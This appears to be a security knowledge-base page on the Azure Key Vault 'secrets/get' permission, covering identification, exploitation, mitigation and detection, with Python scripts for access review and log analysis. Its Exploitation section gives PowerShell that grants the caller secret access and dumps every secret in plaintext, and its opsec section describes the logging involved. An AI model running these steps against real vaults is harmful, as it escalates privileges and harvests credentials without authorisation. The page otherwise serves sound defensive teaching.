# AZ\_GET\_SECRETS

## Summary

|                            |                                                                                                                                                                           |
| -------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**    | AZ\_GET\_SECRETS                                                                                                                                                          |
| **Azure Alias**            | Get Secrets (Key Vault Data Plane)                                                                                                                                        |
| **Affected Object Types**  | Key Vaults                                                                                                                                                                |
| **Exploitation Certainty** | Certain                                                                                                                                                                   |
| **Permission**             | Key Vault data-plane permission `secrets/get` — either via Key Vault access policy or Azure RBAC role **Key Vault Secrets User** (`4633458b-17de-408a-b874-0445c86b69e6`) |

## Description

`AZ_GET_SECRETS` represents the ability to **read secrets** from an Azure Key Vault. This is a data-plane permission that allows retrieval of secret values stored in the vault.

Key Vault secrets commonly contain highly sensitive data:

* **Service principal client secrets** and API keys.
* **Database connection strings** with embedded credentials.
* **Storage account keys**.
* **Third-party API tokens**.
* **Encryption passphrases**.

A principal with this permission can directly read all secret values, making it an immediate credential harvesting opportunity.

## Identification

### PowerShell (Az Module)

```powershell
Connect-AzAccount

# Check access policies on a vault (vault access policy model)
$vault = Get-AzKeyVault -VaultName "<VaultName>"
$vault.AccessPolicies | Where-Object { $_.PermissionsToSecrets -match "get|list|all" } |
    Select-Object DisplayName, ObjectId, PermissionsToSecrets |
    Format-Table -AutoSize

# Check RBAC assignments (RBAC access model)
Get-AzRoleAssignment -Scope $vault.ResourceId |
    Where-Object { $_.RoleDefinitionName -in "Key Vault Secrets User", "Key Vault Secrets Officer", "Key Vault Administrator" } |
    Select-Object DisplayName, RoleDefinitionName, ObjectType |
    Format-Table -AutoSize
```

### Azure CLI

```bash
# Show Key Vault access policies
az keyvault show --name "<VaultName>" --query "properties.accessPolicies[?contains(permissions.secrets, 'get')]"

# Check RBAC assignments
az role assignment list --scope "/subscriptions/<SubId>/resourceGroups/<RGName>/providers/Microsoft.KeyVault/vaults/<VaultName>" -o table
```

### Azure GUI

1. Open **Azure Portal** → navigate to the target **Key Vault**.
2. Go to **Access policies** → review policies that include **Get** under **Secret permissions**.
3. Alternatively, go to **Access control (IAM)** → review assignments for **Key Vault Secrets User** or higher roles.

## Exploitation

### Step 1 — Grant Yourself Secret Access (as Key Vault Contributor)

```powershell
Connect-AzAccount

# Grant yourself secret get/list permissions via access policy
Set-AzKeyVaultAccessPolicy -VaultName "<VaultName>" `
    -ObjectId "<YourObjectId>" `
    -PermissionsToSecrets get,list
```

### Step 2 — Read All Secrets

```powershell
Connect-AzAccount

# List all secrets in the vault
$secrets = Get-AzKeyVaultSecret -VaultName "<VaultName>"

# Read each secret value
$secrets | ForEach-Object {
    $secretValue = Get-AzKeyVaultSecret -VaultName "<VaultName>" -Name $_.Name -AsPlainText
    [PSCustomObject]@{
        Name    = $_.Name
        Value   = $secretValue
        Created = $_.Created
        Updated = $_.Updated
        Enabled = $_.Enabled
    }
} | Format-Table -AutoSize
```

![Read All Secrets](/files/w769j20WYA5QamekD5U6)

### Via PowerZure

* Get-AzureKeyVaultContent
* Export-AzureKeyVaultContent

## Opsec Considerations

Azure writes a log event for the Key Vault whenever a secret is accessed, provided a diagnostic setting with the **AuditEvent** category is enabled on the vault. Each `SecretGet` operation is then recorded in the Key Vault diagnostic logs together with the caller identity and source IP address.

## Mitigation

1. **Restrict secret access policies**
   * Go to **Azure Portal** → target Key Vault → **Access policies**.
   * Remove `get` permission from any principal that does not need to read secrets.
   * Use the principle of least privilege — grant only the specific permissions needed.
2. **Switch to Azure RBAC model**
   * Go to Key Vault → **Access configuration** → select **Azure role-based access control**.
   * Use granular RBAC roles like **Key Vault Secrets User** instead of broad access policies.
3. **Rotate secrets regularly**
   * Secrets stored in Key Vault should be rotated frequently.
   * Use Key Vault secret rotation policies.
4. **Enable diagnostic logging**
   * Go to Key Vault → **Diagnostic settings** → enable **AuditEvent** logging.
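The identification queries above and mitigation steps 1 and 2 amount to one question: which principals can actually read secret values from this vault? The following Python script is an added example (not FSProtect's or Forestall's own tooling) that answers it from the JSON that `az keyvault show` and `az role assignment list` print. It applies the caveat the two access models carry: when `properties.enableRbacAuthorization` is true, access policies are ignored and only the RBAC roles listed on this page grant `secrets/get`; when it is false, data-plane RBAC roles do not apply and only the access policies count. The vault JSON, role assignments, object IDs and the `APPROVED_READERS` allowlist are constructed for the example.

```python
"""Least-privilege review: who can read secret values from one Key Vault?"""
import json

# Role definition names from this page that include secrets/get on the data plane.
SECRET_READ_ROLES = {"Key Vault Secrets User", "Key Vault Secrets Officer",
                     "Key Vault Administrator"}
# Access-policy secret permissions that expose values: 'get' directly, 'all' implicitly.
# 'list' alone returns only metadata, so it is not treated as value read here.
READ_PERMS = {"get", "all"}

# Constructed sample shaped like `az keyvault show` output. Permission names are
# mixed case on purpose: portal-created policies are often capitalised.
VAULT_JSON = """{"name": "kv-example", "properties": {"enableRbacAuthorization": false,
  "accessPolicies": [
    {"objectId": "11111111-1111-1111-1111-111111111111",
     "permissions": {"secrets": ["Get", "List"], "keys": [], "certificates": []}},
    {"objectId": "22222222-2222-2222-2222-222222222222",
     "permissions": {"secrets": ["all"], "keys": ["all"], "certificates": ["all"]}},
    {"objectId": "33333333-3333-3333-3333-333333333333",
     "permissions": {"secrets": ["list"], "keys": [], "certificates": []}}
  ]}}"""
# Constructed sample shaped like `az role assignment list --scope <vault>` output.
ROLE_ASSIGNMENTS_JSON = """[
  {"principalId": "44444444-4444-4444-4444-444444444444",
   "principalName": "ci-deployer", "roleDefinitionName": "Key Vault Secrets User"},
  {"principalId": "55555555-5555-5555-5555-555555555555",
   "principalName": "alice@contoso.example", "roleDefinitionName": "Key Vault Reader"}
]"""
VAULT = json.loads(VAULT_JSON)
ROLE_ASSIGNMENTS = json.loads(ROLE_ASSIGNMENTS_JSON)

# Hypothetical allowlist: object IDs that are approved to read secrets from this vault.
APPROVED_READERS = {"11111111-1111-1111-1111-111111111111",
                    "44444444-4444-4444-4444-444444444444"}


def secret_readers_from_policies(vault):
    """Map objectId -> reason for every access policy that grants secret reads."""
    readers = {}
    for pol in vault["properties"].get("accessPolicies", []):
        perms = {p.lower() for p in pol.get("permissions", {}).get("secrets") or []}
        if perms & READ_PERMS:
            readers[pol["objectId"]] = "access-policy:" + ",".join(sorted(perms))
    return readers


def secret_readers_from_rbac(assignments):
    """Map principalId -> reason for every RBAC assignment that grants secret reads."""
    return {a["principalId"]: "rbac:" + a["roleDefinitionName"]
            for a in assignments if a["roleDefinitionName"] in SECRET_READ_ROLES}


def review(vault, assignments, approved):
    """Return the effective secret readers for the vault's permission model and
    the subset that is not on the approved list (candidates for removal)."""
    if vault["properties"].get("enableRbacAuthorization"):
        model, readers = "rbac", secret_readers_from_rbac(assignments)
    else:
        model, readers = "access-policy", secret_readers_from_policies(vault)
    return {"model": model, "readers": readers,
            "unapproved": sorted(set(readers) - set(approved))}


if __name__ == "__main__":
    result = review(VAULT, ROLE_ASSIGNMENTS, APPROVED_READERS)
    print(f"permission model: {result['model']}")
    for oid, reason in result["readers"].items():
        flag = "REVIEW" if oid in result["unapproved"] else "ok"
        print(f"{flag:6} {oid}  {reason}")
```

Run against the sample, the script reports two effective readers under the access-policy model and flags the `all` policy holder as unapproved; flipping `enableRbacAuthorization` to true leaves only the **Key Vault Secrets User** assignment as an effective reader, which is the state mitigation step 2 aims for.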

## Detection

Monitor secret access in **Key Vault diagnostic logs**.

* Enable **AuditEvent** logging on the Key Vault.
* Alert on:
  * Bulk `SecretGet` or `SecretList` operations.
  * Secret access from unusual identities or IP addresses.
  * Secret access outside of expected automation patterns.

### Azure Monitor / Log Analytics (KQL)

```kql
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.KEYVAULT"
| where OperationName in ("SecretGet", "SecretList")
| project TimeGenerated, CallerIPAddress, OperationName, ResultType, identity_claim_upn_s, Resource, id_s
```
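The KQL query above surfaces the raw `SecretGet`/`SecretList` events; turning the three alert bullets into concrete rules is left to the reader. The following Python script is an added example (not part of FSProtect or this page's original content) that runs those rules over raw AuditEvent records in the JSON-lines shape Key Vault writes to a diagnostic-settings destination. It flags one caller reading many distinct secrets in a short window (bulk harvesting), callers not on an expected-reader list, and access from outside the networks the automation is known to run from. The log lines, identities, IP ranges and thresholds are constructed for the example.

```python
"""Flag suspicious secret reads in Azure Key Vault AuditEvent diagnostic logs."""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Key Vault AuditEvent JSON lines
# (time / operationName / callerIpAddress / identity.claim / properties.id).
# Identities, IPs and vault name are invented for this example.
SAMPLE_LOG_LINES = [
    '{"time":"2024-05-01T02:00:00Z","category":"AuditEvent","operationName":"SecretGet","resultType":"Success","callerIpAddress":"10.0.1.5","identity":{"claim":{"appid":"sp-backup-job"}},"properties":{"id":"https://kv-example.vault.azure.net/secrets/db-conn/1"}}',
    '{"time":"2024-05-01T09:00:00Z","category":"AuditEvent","operationName":"SecretList","resultType":"Success","callerIpAddress":"203.0.113.10","identity":{"claim":{"upn":"alice@contoso.example"}},"properties":{"id":"https://kv-example.vault.azure.net/secrets"}}',
    '{"time":"2024-05-01T09:01:00Z","category":"AuditEvent","operationName":"SecretGet","resultType":"Success","callerIpAddress":"203.0.113.10","identity":{"claim":{"upn":"alice@contoso.example"}},"properties":{"id":"https://kv-example.vault.azure.net/secrets/db-conn/1"}}',
    '{"time":"2024-05-01T09:01:30Z","category":"AuditEvent","operationName":"SecretGet","resultType":"Success","callerIpAddress":"203.0.113.10","identity":{"claim":{"upn":"alice@contoso.example"}},"properties":{"id":"https://kv-example.vault.azure.net/secrets/storage-key/3"}}',
    '{"time":"2024-05-01T09:02:00Z","category":"AuditEvent","operationName":"SecretGet","resultType":"Success","callerIpAddress":"203.0.113.10","identity":{"claim":{"upn":"alice@contoso.example"}},"properties":{"id":"https://kv-example.vault.azure.net/secrets/api-token/2"}}',
    '{"time":"2024-05-01T09:30:00Z","category":"AuditEvent","operationName":"VaultGet","resultType":"Success","callerIpAddress":"10.0.1.5","identity":{"claim":{"appid":"sp-backup-job"}},"properties":{"id":"https://kv-example.vault.azure.net/"}}',
]

# Hypothetical baseline: identities expected to read secrets and the networks
# they run from. In practice this comes from the vault's least-privilege review.
EXPECTED_READERS = {"sp-backup-job"}
EXPECTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]


def parse_audit_events(lines):
    """Keep only AuditEvent SecretGet/SecretList records, normalised to flat dicts."""
    events = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("category") != "AuditEvent":
            continue
        if rec.get("operationName") not in ("SecretGet", "SecretList"):
            continue
        claim = rec.get("identity", {}).get("claim", {})
        events.append({
            "time": datetime.fromisoformat(rec["time"].replace("Z", "+00:00")),
            "op": rec["operationName"],
            # User callers carry a upn claim, service principals an appid claim.
            "caller": claim.get("upn") or claim.get("appid") or "unknown",
            "ip": rec.get("callerIpAddress", ""),
            "secret": rec.get("properties", {}).get("id", ""),
        })
    return events


def _ip_expected(ip):
    """True when the caller IP falls inside one of the expected networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in EXPECTED_NETWORKS)


def detect(events, bulk_threshold=3, window=timedelta(minutes=10)):
    """Return a sorted list of (rule, caller, detail) findings."""
    findings = set()
    by_caller = defaultdict(list)
    for e in events:
        by_caller[e["caller"]].append(e)
    for caller, evs in by_caller.items():
        evs.sort(key=lambda e: e["time"])
        # Rule 1: bulk harvesting - many distinct secrets read within one window.
        gets = [e for e in evs if e["op"] == "SecretGet"]
        for i, start in enumerate(gets):
            distinct = {e["secret"] for e in gets[i:] if e["time"] - start["time"] <= window}
            if len(distinct) >= bulk_threshold:
                findings.add(("bulk_secret_get", caller, len(distinct)))
                break
        for e in evs:
            # Rule 2: identity not on the expected reader list.
            if caller not in EXPECTED_READERS:
                findings.add(("unexpected_identity", caller, e["ip"]))
            # Rule 3: access from outside the networks the automation runs from.
            if not _ip_expected(e["ip"]):
                findings.add(("unexpected_source_ip", caller, e["ip"]))
    return sorted(findings)


if __name__ == "__main__":
    for finding in detect(parse_audit_events(SAMPLE_LOG_LINES)):
        print(finding)
```

On the sample, the backup job's single nightly `SecretGet` from the expected range produces nothing, while the interactive user who lists the vault and then reads three different secrets within two minutes from an outside address trips all three rules. The same logic maps onto the KQL above by summarising `dcount(id_s)` per `identity_claim_upn_s` and `CallerIPAddress` over a time bin.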

## References

* <https://learn.microsoft.com/en-us/azure/key-vault/general/security-features>
* <https://blog.netspi.com/azure-automation-accounts-key-stores/>
* <https://powerzure.readthedocs.io/en/latest/Functions/operational.html#get-azurekeyvaultcontent>
